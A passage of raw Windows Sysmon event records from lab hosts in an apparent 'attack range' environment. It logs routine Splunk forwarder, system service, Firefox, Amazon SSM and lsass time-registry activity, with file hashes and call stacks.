Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.706{C8EA50B7-15E0-6216-E406-000000003802}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:20.346{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D426DEE09ED19D0FB17369335BB511AD,SHA256=C8B04DA31732256C464D56E6EABEF851AFFF3C7E794F7CE18006B7E2DD5AA243,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:18.662{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49301-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000295997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.226{C8EA50B7-15DF-6216-E306-000000003802}69006716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.758{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26821E96C64AE5DB6F9E8928B5C78613,SHA256=39D0EFE7005E6252E9AC89E19828241487C995C99142EF11D8C31B29E07B0B14,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:19.546{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51559-false10.0.1.12-8000- 23542300x8000000000000000220088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:21.362{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E389E8C0E4B080E3D2D89EEEF96FF0B3,SHA256=95EE38D5A3870ADF7AD21FFD771E27E684635EE2544E87148343842728DC45FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.373{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15E1-6216-E506-000000003802}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.373{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.373{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.373{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.373{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.373{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-15E1-6216-E506-000000003802}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.373{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15E1-6216-E506-000000003802}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.374{C8EA50B7-15E1-6216-E506-000000003802}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:21.004{C8EA50B7-15E0-6216-E406-000000003802}57206724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:22.758{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0519BE645A86AA99CC06D9D38551F56,SHA256=B06C6F500D961DCB5FA1AEF6099AA544419ACF028705F8E1AE73BF9E00CA7B90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:22.378{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E07C457A046BB6DD082C1C165F59906,SHA256=CE69F28F6D3E7AFB43A66B91F52C2B6DE6450BFA74CAB24DF87832FD2E65A6AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:23.759{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35E887BD7C519FE3587D3F89700AC3D2,SHA256=75AF7F6D250AC90748E865A1194C53CB9EFE3250AE88CB55E6239DA0F142617B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:23.393{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95497ACE8088875B4A57AE280A41DBD8,SHA256=B3EF2D397B100DC08EBDFC0C4935495ED15BB6E1325EB70976E69BA62B130782,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:24.820{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=439C04CA7D253C85D043EE46C5ACD1AD,SHA256=CE8B478AF135ED7CD4824CB218AA072ED1DCA50752B76982BA14542678F94B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:24.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB097D0F1E7B817BC14BE70D2FF71952,SHA256=F6C2D56BB0D43DABE8A618624FFE631D93782609D06FF00BF287A455737F7D8D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:25.972{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000296024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:25.972{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:25.972{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF8fc943.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:25.838{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8578BBE18A95CAF16CEE16BC6A2032B,SHA256=4CA0D9D2D3C343A2BEDF1BBA35A58C3DD4045A5744237E4C7329E78E0B1F1C52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:25.787{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-152MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:25.410{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F58BE379B9F614F9AC33578214820172,SHA256=6B89CC21DAB1F92F162303E3E53619950C6FEB4D49C65AD594FF6A46D80F9D49,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:26.987{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:26.856{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D9DC58C49D4267746E73E77AC20F529,SHA256=9BA9F579E70825B63A9A6CE18B6563B564B99FFC047473A0B684795058A0A715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:26.789{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-153MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:26.414{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50F79570455C231FC3E60AC5073265F0,SHA256=371D5D9F3DE0B031FDDA10D49D14B42278BE0E6AAA6D79BCC25A07F7083685F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:26.819{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=BE8ADD6795719D784E55859FE1E14B7D,SHA256=014436CBEA03B7F43E7FA059C4968ED66FFB11B1085933FC8D730723C866A268,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000296036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000296035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x008fcc31) 13241300x8000000000000000296034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289d-0x702281d9) 13241300x8000000000000000296033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a5-0xd1e6e9d9) 13241300x8000000000000000296032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ae-0x33ab51d9) 13241300x8000000000000000296031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000296030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 